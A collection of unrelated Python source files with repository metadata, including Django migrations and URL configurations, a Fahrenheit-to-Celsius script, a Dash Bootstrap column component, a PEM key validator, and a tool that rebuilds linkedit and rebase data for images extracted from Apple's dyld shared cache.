/gongfei/month03/Django/onlybuy/OnlyBuy/goods/migrations/0002_goods_saller.py
|
d6b69407f107d03ed0eace38b76d59329ac825ea
|
[] |
no_license
|
gongfei6644/gongfei
|
2beb082c56197bc23ca20a6927ff6c10d8beaa83
|
bfdd5e6a3a8d76ad1e43cf54df186b944cad29e4
|
refs/heads/master
| 2022-11-30T20:49:22.213040
| 2020-08-16T12:52:28
| 2020-08-16T12:52:28
| 286,283,597
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 648
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.8 on 2019-06-19 14:35
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('goods', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='goods',
name='saller',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
]
|
[
"1"
] |
1
|
e0dd3a5fc83f8f2e2d1152ce7a6035039cec3e4e
|
33f4e2028c2defd6c85e3af7d2df37f93dea1620
|
/app/pages/migrations/0001_initial.py
|
9e5af3de8615df5eda1652f005b7096b07d6b422
|
[] |
no_license
|
Alienka89/test_project
|
59bb4057c508b2e355712777c86484c481e0d846
|
8cae27149a5df76273bc7971dd2fc3e9fb4f7a9b
|
refs/heads/main
| 2023-02-26T14:53:22.849660
| 2021-02-07T23:12:17
| 2021-02-07T23:12:17
| 336,908,070
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,185
|
py
|
# Generated by Django 3.1.6 on 2021-02-07 21:37
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Audio',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('audio', models.FileField(max_length=512, upload_to='media/pages/audio/', verbose_name='ссылка на аудио')),
('bitrate', models.IntegerField(default=256, help_text='кбит/с', verbose_name='битрейт')),
],
options={
'verbose_name': 'Аудио',
'verbose_name_plural': 'Аудио',
},
),
migrations.CreateModel(
name='Page',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=1047, verbose_name='название страницы')),
('order_number', models.IntegerField(default=1, verbose_name='порядковый номер')),
('hide', models.BooleanField(default=False, verbose_name='скрыть')),
('counter', models.PositiveIntegerField(default=0, editable=False, verbose_name='счетчик просмотров')),
],
options={
'verbose_name': 'страница',
'verbose_name_plural': 'страницы',
'ordering': ('order_number',),
},
),
migrations.CreateModel(
name='Photo',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('photo', models.ImageField(upload_to='media/pages/photo/', verbose_name='изображение')),
],
options={
'verbose_name': 'Фотография',
'verbose_name_plural': 'Фотографии',
},
),
migrations.CreateModel(
name='Text',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.TextField(verbose_name='текст')),
],
options={
'verbose_name': 'Текст',
'verbose_name_plural': 'Тексты',
},
),
migrations.CreateModel(
name='Video',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('video', models.CharField(max_length=512, verbose_name='ссылка на видео')),
('subtitles', models.CharField(blank=True, max_length=512, null=True, verbose_name='ссылка на субтитры')),
],
options={
'verbose_name': 'Видео',
'verbose_name_plural': 'Видео',
},
),
migrations.CreateModel(
name='Content',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=1047, verbose_name='название блока контента')),
('content_type', models.CharField(choices=[('text', 'текст'), ('audio', 'аудио'), ('video', 'видео'), ('photo', 'фото')], default='text', max_length=10, verbose_name='тип контента')),
('order_number', models.PositiveIntegerField(default=1, verbose_name='порядковый номер')),
('counter', models.PositiveIntegerField(default=0, editable=False, verbose_name='счетчик просмотров')),
('audio', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='content', to='pages.audio', verbose_name='аудио')),
('page', models.ForeignKey(default=None, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='content', to='pages.page', verbose_name='Контент')),
('photo', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='content', to='pages.photo', verbose_name='фото')),
('text', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='content', to='pages.text', verbose_name='текст')),
('video', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='content', to='pages.video', verbose_name='видео')),
],
options={
'verbose_name': 'контент',
'verbose_name_plural': 'контент',
'ordering': ('order_number',),
},
),
]
|
[
"abulatova@dtln.ru"
] |
abulatova@dtln.ru
|
8970935fc41f575ebe52741f5209d23c102e738e
|
648ff4244380cbd042116885c17e9cdd159f4d86
|
/SMRFF/utest.py
|
5da55559396351f95fa742e722c06d022f65f8b3
|
[] |
no_license
|
sunatthegilddotcom/perovskite-solvents
|
3d9b9fc53d7a4c30dd55131c84a1493043c55367
|
c644ff1eb9c827a348eeeb94a253690066ab7c06
|
refs/heads/master
| 2021-05-31T14:20:57.073824
| 2016-06-01T21:12:26
| 2016-06-01T21:12:26
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 471
|
py
|
from merlin import *
#utils.opt_opls('methacrolein', taboo_time=10)
extra = { (19, 66): (47, 3, 46):(85.00, 120.00), (47, 47, 3, 46):(0.0, 14.0, 0.0, 0.0) }
#torsion 46 47 47 46 0.000 0.0 1 14.000 180.0 2 0.000 0.0 3
for name in ['pbcl_p']:
print utils.Molecule('cml/'+name, check_charges= False)
#2 6 [20, 48, 48, 13, 48, 49, 46, 46, 46, 49, 49]
#2 4 [5, 48, 48, 13, 48, 49, 46, 46, 46, 49, 49]
#2 17 [20, 48, 48, 13, 48, 49, 46, 46, 46, 49, 49]
|
[
"jminuse@gmail.com"
] |
jminuse@gmail.com
|
056d8d16c6915c205d1ad27aa3394b8c877a91cb
|
d1b1c6ef92e1cd650c1479d0900d7f0ca599772d
|
/hello_django/hello/urls.py
|
ff27f829836724536d4386cfff89c4d835c02e31
|
[] |
no_license
|
MaFengWoXiaoZi/django_learning
|
30005d5c88fe646d4c9ac9c0e98cc3dacef06b22
|
fae7c6e957aede7a160c115dd2867e5b430b7c62
|
refs/heads/master
| 2021-09-05T19:36:51.263932
| 2018-01-30T15:43:50
| 2018-01-30T15:43:50
| 115,636,602
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,293
|
py
|
from django.core.urlresolvers import reverse
"""hello_django URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.9/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Add an import: from blog import urls as blog_urls
2. Import the include() function: from django.conf.urls import url, include
3. Add a URL to urlpatterns: url(r'^blog/', include(blog_urls))
"""
from django.conf.urls import url, include
from hello import views
staticmethod
urlpatterns = [
url(r'^hello/$', views.hello, {'a': '123'}),
url(r'^test/\d{2}/$', 'hello.views.test'),
url(r'^test2/(?P<id>\d{2})/$', 'hello.views.test2'),
url(r'^test3/(?P<id>\d{2})/(?P<key>\w+)/$', 'hello.views.test3'),
]
#urlpatterns = [
# url(r'^hello/$', 'hello.views.hello', {'a': '123'})
#]
# The way is not recommended
#from django.conf.urls import patterns
#from hello import views
#
#urlpatterns = patterns('',
# (r'^hello/$', views.hello),
#)
|
[
"mafengwoxiaozi@gmail.com"
] |
mafengwoxiaozi@gmail.com
|
8368a60298be2826652c9b2392af1de2414977d0
|
36df29dbd2c79f41ee5e70a6b836303d0f0fe186
|
/day1-15/day01/temperature.py
|
682675e9cff305a0db4848e6ddfe9d9035042a27
|
[] |
no_license
|
roohom/Program_100Days
|
abbe20d5df4444adadc937f23f1e402fce3a8273
|
3fd87da8b8edaaeb9349f68db0b9b3cd0db9f159
|
refs/heads/master
| 2021-01-13T18:06:52.899517
| 2020-08-30T15:37:07
| 2020-08-30T15:37:07
| 242,451,115
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 313
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2020/2/24 14:40
# @Author : Roohom
# @Site :
# @File : temperature.py
# @Software: PyCharm
"""
将华氏温度转化为摄氏温度
"""
F = float(input("请输入华氏温度:"))
C = (F - 32) / 1.8
print('%.2f华氏度 = %.1f摄氏度' % (F, C))
|
[
"roohom@qq.com"
] |
roohom@qq.com
|
0812e2bcc293a9c03102a0f77050227c0e0f6292
|
d0be9a3ac7c4e3eb18fc3f466bbbc3f12e1299ec
|
/app/kube_settings/validators.py
|
54810d6c4cfc940b097048c5d6bb606e4b36467b
|
[
"MIT"
] |
permissive
|
PlatformOfTrust/connector-dummy-with-tests
|
0c3f8e69058f80cdedd8f617d11bba623a93ca88
|
f7c7d2283be3b9e8a4d7ff348f7799330f6d7e6a
|
refs/heads/main
| 2023-05-09T07:12:35.378027
| 2021-06-07T11:55:58
| 2021-06-07T11:55:58
| 303,936,477
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 375
|
py
|
from app.log import logger
def check_pem_key(value: str):
"""Check if string is a valid PEM formatted key"""
from Crypto.PublicKey import RSA # nosec we use PyCryptodome, not PyCrypto
try:
RSA.importKey(value)
except Exception as exc:
msg = "Failed to import PEM formatted key"
logger.exception(msg)
raise ValueError(msg)
|
[
"noreply@github.com"
] |
PlatformOfTrust.noreply@github.com
|
5dbeac0b41a5a9769e34bc790b7a36b13aa7a48c
|
1ea814382e6038b68c2978cf3c2e0410f1a90371
|
/DyldExtractor/Converter/LinkeditConverter.py
|
c01947447aa001ef615efff87c690e3abb70d9b2
|
[] |
no_license
|
sohsatoh/DyldExtractor
|
94a9dd7da9601e24ca1e0e6909ef0584fedf3c8c
|
42b5cf65619e9d54999d9000d72b32ae4be68a2a
|
refs/heads/master
| 2023-02-19T23:01:14.557607
| 2020-12-12T16:57:17
| 2020-12-12T16:57:17
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 11,658
|
py
|
import struct
import typing
from DyldExtractor import MachO
from DyldExtractor import Dyld
from DyldExtractor import Uleb128
class LinkeditConverter(object):
"""Rebuilds the linkedit.
The all the linkedit segments in the dyld are combined
into one big linkedit segment that is shared by all
images. This class rebuilds the linkedit segment,
decaching only the necessary data.
"""
exports: typing.List[MachO.TrieEntry]
localSymEntry: Dyld.dyld_cache_local_symbols_entry
def __init__(self, machoFile: MachO.MachoFile, dyldFile: Dyld.DyldFile) -> None:
self.machoFile = machoFile
self.dyldFile = dyldFile
pass
def convert(self) -> None:
self.readExports()
self.getLocalSymEntry()
self.buildSymbolTable()
self.pointerAlignData()
pass
def readExports(self) -> None:
"""
Gets export symbols
"""
exportData = self.machoFile.getLoadCommand((MachO.LoadCommands.LC_DYLD_INFO, MachO.LoadCommands.LC_DYLD_INFO_ONLY)).exportData
self.exports = MachO.TrieParser(exportData).parse()
# remove any non ReExport symbols
reExportDeps = []
deps = self.machoFile.getLoadCommand(
(
MachO.LoadCommands.LC_LOAD_DYLIB,
MachO.LoadCommands.LC_LOAD_WEAK_DYLIB,
MachO.LoadCommands.LC_REEXPORT_DYLIB,
MachO.LoadCommands.LC_LOAD_UPWARD_DYLIB
),
multiple=True
)
if deps:
depIndex = 0
for dep in deps:
depIndex += 1
if dep.cmd == MachO.LoadCommands.LC_REEXPORT_DYLIB:
reExportDeps.append(depIndex)
def isReExport(entry: MachO.TrieEntry) -> bool:
if (entry.flags & MachO.Export.EXPORT_SYMBOL_FLAGS_KIND_MASK) != MachO.Export.EXPORT_SYMBOL_FLAGS_KIND_REGULAR:
return True
if (entry.flags & MachO.Export.EXPORT_SYMBOL_FLAGS_REEXPORT) == 0:
return True
if entry.other in reExportDeps:
return True
return False
self.exports = [export for export in self.exports if isReExport(export)]
pass
def getLocalSymEntry(self) -> None:
"""
Gets the local symbol entry from the
Dyld header.
"""
textSeg = self.machoFile.getSegment(b"__TEXT\x00")
for entry in self.dyldFile.localSymbolInfo.entries:
if entry.dylibOffset == textSeg.fileoff:
self.localSymEntry = entry
break
pass
def calculateEntryCount(self) -> int:
"""
Calculates and returns the number of
entries in the new symbol table.
"""
symtabCommand: Macho.symtab_command = self.machoFile.getLoadCommand(MachO.LoadCommands.LC_SYMTAB)
# count local symbols
entryCount = self.localSymEntry.nlistCount
# count other symbols
for i in range(0, len(symtabCommand.symbolData), 16):
nType = struct.unpack_from("<B", symtabCommand.symbolData, i + 4)[0]
# skip any locals in cache
if (nType & (MachO.NList.N_TYPE | MachO.NList.N_EXT)) == MachO.NList.N_SECT:
continue
entryCount += 1
# add indirect symbols
dysymtabCommand: Macho.dysymtab_command = self.machoFile.getLoadCommand(MachO.LoadCommands.LC_DYSYMTAB)
entryCount += dysymtabCommand.nindirectsyms
# add room for N_INDR symbols for re-exported symbols
entryCount += len(self.exports)
return entryCount
def buildSymbolTable(self) -> None:
"""
Rebuilds the symbol table.
"""
newStrData = b"\x00"
newSymTab = b""
symtabCommand: Macho.symtab_command = self.machoFile.getLoadCommand(MachO.LoadCommands.LC_SYMTAB)
# copy original symbols
for i in range(0, len(symtabCommand.symbolData), MachO.nlist_64.SIZE):
symEntry: Macho.nlist_64 = MachO.nlist_64.parseBytes(symtabCommand.symbolData, i)
# skip local symbols for now
if (symEntry.n_type & (MachO.NList.N_TYPE | MachO.NList.N_EXT)) == MachO.NList.N_SECT:
continue
# get the symbol
symEnd = symtabCommand.stringData.index(b"\x00", symEntry.n_strx) + 1
symbol = symtabCommand.stringData[symEntry.n_strx:symEnd]
# adjust the entry and add it to the new tables
symEntry.n_strx = len(newStrData)
newSymTab += symEntry.asBytes()
newStrData += symbol
# add N_INDR symbols
for export in self.exports:
symEntry = MachO.nlist_64()
symEntry.n_strx = len(newStrData)
symEntry.n_type = MachO.NList.N_INDR | MachO.NList.N_EXT
symEntry.n_sect = 0
symEntry.n_desc = 0
newStrData += export.name
importName = export.importName if export.importName else export.name
symEntry.n_value = len(newStrData)
newStrData += importName
newSymTab += symEntry.asBytes()
# add the local symbols
# but first update the load commands
dysymtabCommand: Macho.dysymtab_command = self.machoFile.getLoadCommand(MachO.LoadCommands.LC_DYSYMTAB)
dysymtabCommand.ilocalsym = int(len(newSymTab) / MachO.nlist_64.SIZE)
dysymtabCommand.nlocalsym = self.localSymEntry.nlistCount
# add the indirect symbols
indirectSymbolLocalCount = 0
indirectsymsData = bytearray(dysymtabCommand.indirectsymsData)
for i in range(0, len(indirectsymsData), 4):
entryIndex = struct.unpack_from("<I", indirectsymsData, i)[0]
if entryIndex == 0x80000000:
indirectSymbolLocalCount += 1
continue
entryOff = entryIndex * MachO.nlist_64.SIZE
entry = MachO.nlist_64.parseBytes(symtabCommand.symbolData, entryOff)
# get the symbol
symEnd = symtabCommand.stringData.index(b"\x00", entry.n_strx) + 1
sym = symtabCommand.stringData[entry.n_strx:symEnd]
# add the entry
newEntryIndex = int(len(newSymTab) / MachO.nlist_64.SIZE)
struct.pack_into("<I", indirectsymsData, i, newEntryIndex)
entry.n_strx = len(newStrData)
newSymTab += entry.asBytes()
# add the symbol
newStrData += sym
dysymtabCommand.indirectsymsData = bytes(indirectsymsData)
# copy local symbols
for i in range(0, self.localSymEntry.nlistCount):
symOff = (i + self.localSymEntry.nlistStartIndex) * MachO.nlist_64.SIZE
symEntry = MachO.nlist_64.parseBytes(self.dyldFile.localSymbolInfo.nlistData, symOff)
localSymEnd = self.dyldFile.localSymbolInfo.stringData.index(b"\x00", symEntry.n_strx) + 1
localSym = self.dyldFile.localSymbolInfo.stringData[symEntry.n_strx:localSymEnd]
symEntry.n_strx = len(newStrData)
newSymTab += symEntry.asBytes()
newStrData += localSym
if (self.calculateEntryCount() - indirectSymbolLocalCount) != (len(newSymTab) / MachO.nlist_64.SIZE):
raise Exception("symbol count miscalculation")
# set the new data
symtabCommand.symbolData = newSymTab
symtabCommand.nsyms = int(len(newSymTab) / MachO.nlist_64.SIZE)
symtabCommand.stringData = newStrData
symtabCommand.strsize = len(newStrData)
pass
def pointerAlignData(self) -> None:
"""
Rounds up the size of various sections to the next pointer.
Assume that the pointer size is 64 bits.
"""
funcStarts = self.machoFile.getLoadCommand(MachO.LoadCommands.LC_FUNCTION_STARTS)
while (len(funcStarts.linkeditData) % 8) != 0:
funcStarts.linkeditData += b"\x00"
funcStarts.datasize = len(funcStarts.linkeditData)
symtab = self.machoFile.getLoadCommand(MachO.LoadCommands.LC_SYMTAB)
while (len(symtab.stringData) % 8) != 0:
symtab.stringData += b"\x00"
symtab.strsize = len(symtab.stringData)
pass
class RebaseConverter(object):
"""
Processes the compressed slide info from the dyld cache and
creates new rebase info.
"""
def __init__(self, machoFile: MachO.MachoFile, dyldFile: Dyld.DyldFile) -> None:
self.machoFile = machoFile
self.dyldFile = dyldFile
self.rebaseInfo = bytearray()
self.rebaseInfo.append(MachO.Rebase.REBASE_OPCODE_SET_TYPE_IMM | MachO.Rebase.REBASE_TYPE_POINTER)
def convert(self) -> None:
"""
Starts the conversion.
"""
self.rebaseSegment(self.machoFile.getSegment(b"__DATA_CONST\x00"))
self.rebaseSegment(self.machoFile.getSegment(b"__DATA\x00"))
self.rebaseSegment(self.machoFile.getSegment(b"__DATA_DIRTY\x00"))
self.finalize()
pass
def rebaseSegment(self, segment: MachO.segment_command_64) -> None:
"""
Processes the slide info for one segment.
"""
if not segment:
return
dataStart = self.dyldFile.mappings[1].address
# get the page index which contains the start and end of the segment.
pageSize = self.dyldFile.slideInfo.page_size
startPageAddr = segment.vmaddr - dataStart
startPage = int(startPageAddr / pageSize)
endPageAddr = (((segment.vmaddr + segment.vmsize) - dataStart) + pageSize) & ~pageSize
endPage = int(endPageAddr / pageSize)
# process each page
pageStarts = struct.iter_unpack("<H", self.dyldFile.slideInfo.pageStartsData)
pageStarts = [page[0] for page in pageStarts]
for i in range(startPage, endPage):
page = pageStarts[i]
if page == Dyld.Slide.DYLD_CACHE_SLIDE_PAGE_ATTR_NO_REBASE:
pass
elif page & Dyld.Slide.DYLD_CACHE_SLIDE_PAGE_ATTR_EXTRA:
raise Exception("Can't handle page extras")
elif (page & Dyld.Slide.DYLD_CACHE_SLIDE_PAGE_ATTR_EXTRA) == 0:
pageOffset = (i * pageSize) + self.dyldFile.mappings[1].fileOffset
self.rebasePage(pageOffset, page * 4, segment)
else:
raise Exception("Unknown page type")
pass
def rebasePage(self, pageOffset: int, firstRebaseOffset: int, segment: MachO.segment_command_64) -> None:
"""
processes the rebase infomation in a page
### parameters
pageOffset: int
The file offset of the page.
firstRebaseOffset: int
The offset from the start of the page to the first
rebase location.
segment: segment_command_64
The segment to rebase.
"""
segmentIndex = self.machoFile.loadCommands.index(segment)
deltaMask = self.dyldFile.slideInfo.delta_mask
valueMask = ~deltaMask
valueAdd = self.dyldFile.slideInfo.value_add
# basically __builtin_ctzll(deltaMask) - 2;
deltaShift = "{0:b}".format(deltaMask)
deltaShift = len(deltaShift) - len(deltaShift.rstrip("0"))
deltaShift = deltaShift - 2
delta = 1
rebaseOffset = firstRebaseOffset
while delta != 0:
realLoc = pageOffset + rebaseOffset
self.dyldFile.file.seek(realLoc)
rawValueBytes = self.dyldFile.file.read(8)
rawValue = struct.unpack("<Q", rawValueBytes)[0]
delta = (rawValue & deltaMask) >> deltaShift
value = rawValue & valueMask
if value:
value += valueAdd
# if the location is within the segment, adjust the data
if realLoc >= segment.fileoff and realLoc < (segment.fileoff + segment.filesize):
self.slideLocation(realLoc, value, segment)
# add a rebase entry
self.rebaseInfo.append(MachO.Rebase.REBASE_OPCODE_SET_SEGMENT_AND_OFFSET_ULEB | segmentIndex)
self.rebaseInfo += Uleb128.encodeUleb128(realLoc - segment.fileoff)
self.rebaseInfo.append(MachO.Rebase.REBASE_OPCODE_DO_REBASE_IMM_TIMES | 0x1)
rebaseOffset += delta
def slideLocation(self, fileOffset: int, value: int, segment: MachO.segment_command_64) -> None:
"""
Sets the value at the file offset.
"""
# find the section with the fileOffset
containingSect = None
for section in segment.sections:
if fileOffset >= section.offset and fileOffset < (section.offset + section.size):
containingSect = section
break
if not containingSect:
raise Exception("Unable to find section")
# write it
sectionOff = fileOffset - containingSect.offset
sectionData = section.sectionData[0:sectionOff]
sectionData += struct.pack("<Q", value)
sectionData += section.sectionData[sectionOff+8:]
containingSect.sectionData = sectionData
def finalize(self) -> None:
"""
Finalizes the rebase info, and sets the data in the macho file.
"""
self.rebaseInfo.append(MachO.Rebase.REBASE_OPCODE_DONE)
dyldCommand = self.machoFile.getLoadCommand((MachO.LoadCommands.LC_DYLD_INFO, MachO.LoadCommands.LC_DYLD_INFO_ONLY))
dyldCommand.rebaseData = bytes(self.rebaseInfo)
dyldCommand.rebase_size = len(self.rebaseInfo)
|
[
"haow6449@gmail.com"
] |
haow6449@gmail.com
|
b5330606886b1e17f9c48c5b8b435ce85f4c5b24
|
5974396434d3cbff785f696b80d27e6fc92c7ffd
|
/posts/urls.py
|
e75b65c76d911c104716de59e714a82cbd8fe3ec
|
[] |
no_license
|
thevivekshukla/django-blog
|
66a5a8e319269e627da7840626b433c40e2faa42
|
f521e2e72789cb3cdd85d5b2ccab9c2bdd204f66
|
refs/heads/master
| 2021-01-01T16:24:39.907564
| 2017-09-11T09:44:54
| 2017-09-11T09:44:54
| 97,830,071
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 577
|
py
|
from django.conf.urls import url
from . import views
app_name = 'posts'
urlpatterns = [
url(r'^post/new/$', views.post_create, name='post_create'),
url(r'^(?P<slug>[\w-]+)/$', views.post_detail, name='post_detail'),
url(r'^$', views.post_list, name='post_list'),
url(r'^(?P<slug>[\w-]+)/edit/$', views.post_update, name='post_update'),
url(r'^(?P<slug>[\w-]+)/delete/$', views.post_delete, name='post_delete'),
url(r'^post/draft/$', views.post_draft, name="post_draft"),
url(r'^post/published/$', views.post_published, name="post_published"),
]
|
[
"viv3kshukla@gmail.com"
] |
viv3kshukla@gmail.com
|
5e1999c89045efcad19540cd757f6d1fdfc21ab2
|
80da32b5ff1006f572920839a884edbdc7848902
|
/web/main/urls.py
|
e5ab3f774606d5a834fbb28352548e67ddf82751
|
[] |
no_license
|
SilinAlexander/Shop2
|
1f09c58d1463ef195df37418c267f2e3b6c51172
|
98fe52e97b0b8231d62674a39985e940a263f342
|
refs/heads/master
| 2023-04-03T13:42:48.284467
| 2021-04-10T10:16:00
| 2021-04-10T10:16:00
| 345,267,486
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 628
|
py
|
from django.contrib.auth.decorators import login_required
from django.views.generic import RedirectView
from django.contrib.auth.views import LogoutView
from django.urls import path
from . import views
urlpatterns = [
# path('', login_required(RedirectView.as_view(pattern_name='admin:index'))),
path('', views.BaseView.as_view(), name='base'),
path('signup/', views.UserSignUpView.as_view(), name='signup'),
path('logout/', LogoutView.as_view(next_page='/'), name='logout'),
path('login/', views.UserSignInView.as_view(), name='login'),
# path('email/', views.SendEmailView.as_view(), name='login'),
]
|
[
"asilin1997@mail.ru"
] |
asilin1997@mail.ru
|
c002bc2b4eb785c4ce7ad08f53bfcf002e3a8920
|
cb0c6a71c47b78cf0511fafc8e31deafcd77dbf2
|
/pages 0-100/first_letter.py
|
c48501988f2a12bd130cf86dfb407a88ca4866b5
|
[] |
no_license
|
kaismithereens/realpython
|
123ef939c1822508980ba8a042d5d1ed442c2e75
|
7c57efbe12a3eaa4e8245b72486a77fc2cf78c74
|
refs/heads/master
| 2021-04-27T08:50:01.159261
| 2018-11-03T10:30:40
| 2018-11-03T10:30:40
| 122,499,501
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 102
|
py
|
user_input = input("Tell me your password: ")
first_letter = user_input[0].upper()
print(first_letter)
|
[
"kai.nevermind@gmail.com"
] |
kai.nevermind@gmail.com
|
d81e23a2907a7d07f2afa16bf3158c280073b0b7
|
26c744710944c807d75e14d321fcdb796dc723d8
|
/env/Lib/site-packages/dash_bootstrap_components/_components/Col.py
|
e74c8bd8e7c17c32464a721cb7d3d0fd0a852125
|
[] |
no_license
|
12JoshiMukesh/ServiceNowDashboard
|
2aa0f7031021f43d3160bc048103d114c230dc5e
|
0685dcceb082c6a9b68255e95573b664d3fee343
|
refs/heads/master
| 2023-08-04T17:04:46.449153
| 2021-09-25T06:18:14
| 2021-09-25T06:18:14
| 408,410,106
| 1
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,650
|
py
|
# AUTO GENERATED FILE - DO NOT EDIT
from dash.development.base_component import Component, _explicitize_args
class Col(Component):
"""A Col component.
Component for creating Bootstrap columns to control the layout of your page.
Use the width argument to specify width, or use the breakpoint arguments
(xs, sm, md, lg, xl) to control the width of the columns on different screen
sizes to achieve a responsive layout.
Keyword arguments:
- children (a list of or a singular dash component, string or number; optional):
The children of this component.
- id (string; optional):
The ID of this component, used to identify dash components in
callbacks. The ID needs to be unique across all of the components
in an app.
- align (a value equal to: 'start', 'center', 'end', 'stretch', 'baseline'; optional):
Set vertical alignment of this column's content in the parent row.
Options are 'start', 'center', 'end', 'stretch', 'baseline'.
- className (string; optional):
Often used with CSS to style elements with common properties.
- key (string; optional):
A unique identifier for the component, used to improve performance
by React.js while rendering components See
https://reactjs.org/docs/lists-and-keys.html for more info.
- lg (optional):
Specify column behaviour on a large screen. Valid arguments are
boolean, an integer in the range 1-12 inclusive, or a dictionary
with keys 'offset', 'order', 'size'. See the documentation for
more details.
- loading_state (dict; optional):
Object that holds the loading state object coming from
dash-renderer.
`loading_state` is a dict with keys:
- component_name (string; optional):
Holds the name of the component that is loading.
- is_loading (boolean; optional):
Determines if the component is loading or not.
- prop_name (string; optional):
Holds which property is loading.
- md (optional):
Specify column behaviour on a medium screen. Valid arguments are
boolean, an integer in the range 1-12 inclusive, or a dictionary
with keys 'offset', 'order', 'size'. See the documentation for
more details.
- sm (optional):
Specify column behaviour on a small screen. Valid arguments are
boolean, an integer in the range 1-12 inclusive, or a dictionary
with keys 'offset', 'order', 'size'. See the documentation for
more details.
- style (dict; optional):
Defines CSS styles which will override styles previously set.
- width (optional):
Specify the width of the column. Behind the scenes this sets
behaviour at the xs breakpoint, and will be overriden if xs is
specified. Valid arguments are boolean, an integer in the range
1-12 inclusive, or a dictionary with keys 'offset', 'order',
'size'. See the documentation for more details.
- xl (optional):
Specify column behaviour on an extra large screen. Valid
arguments are boolean, an integer in the range 1-12 inclusive, or
a dictionary with keys 'offset', 'order', 'size'. See the
documentation for more details.
- xs (optional):
Specify column behaviour on an extra small screen. Valid
arguments are boolean, an integer in the range 1-12 inclusive, or
a dictionary with keys 'offset', 'order', 'size'. See the
documentation for more details."""
@_explicitize_args
def __init__(self, children=None, id=Component.UNDEFINED, style=Component.UNDEFINED, className=Component.UNDEFINED, key=Component.UNDEFINED, width=Component.UNDEFINED, xs=Component.UNDEFINED, sm=Component.UNDEFINED, md=Component.UNDEFINED, lg=Component.UNDEFINED, xl=Component.UNDEFINED, align=Component.UNDEFINED, loading_state=Component.UNDEFINED, **kwargs):
self._prop_names = ['children', 'id', 'align', 'className', 'key', 'lg', 'loading_state', 'md', 'sm', 'style', 'width', 'xl', 'xs']
self._type = 'Col'
self._namespace = 'dash_bootstrap_components'
self._valid_wildcard_attributes = []
self.available_properties = ['children', 'id', 'align', 'className', 'key', 'lg', 'loading_state', 'md', 'sm', 'style', 'width', 'xl', 'xs']
self.available_wildcard_properties = []
_explicit_args = kwargs.pop('_explicit_args')
_locals = locals()
_locals.update(kwargs) # For wildcard attrs
args = {k: _locals[k] for k in _explicit_args if k != 'children'}
for k in []:
if k not in args:
raise TypeError(
'Required argument `' + k + '` was not specified.')
super(Col, self).__init__(children=children, **args)
|
[
"MAILNDG@REDIFF.com"
] |
MAILNDG@REDIFF.com
|
9e4a6f3e8b974eb720523b31486a9285b279b22f
|
c7219c4d42071b623782522c5620b7cccbf38747
|
/venv/Scripts/pip3-script.py
|
0c2f3987f3d8952c8783d6f27fc28f092f75bc6c
|
[] |
no_license
|
hongli9388/auto-register
|
f62c8900e45ce18ad7c3759b72d9ef74b86b7493
|
7f0a21b60db14c4b8c72e924a17a1ecd943d4296
|
refs/heads/master
| 2022-12-16T17:06:22.058761
| 2019-01-18T06:31:50
| 2019-01-18T06:31:50
| 164,560,647
| 0
| 0
| null | 2022-12-08T01:32:44
| 2019-01-08T04:28:05
|
Python
|
UTF-8
|
Python
| false
| false
| 410
|
py
|
#!E:\pycharm_home\auto_test_register_api\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==9.0.1','console_scripts','pip3'
__requires__ = 'pip==9.0.1'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==9.0.1', 'console_scripts', 'pip3')()
)
|
[
"hongli9388@163.com"
] |
hongli9388@163.com
|
72e6050d6c33d356d46e738ec6c5040e26acc627
|
fea4df9f31e62d7fc1adf0a5ca08c017cce504c1
|
/site_experiences/admin.py
|
b85e9c2ffdea9f247944eba23d694ef359d65798
|
[] |
no_license
|
tahericode/personal-site-with-django
|
47eec11c243d047ced7bb997913b53c902913b23
|
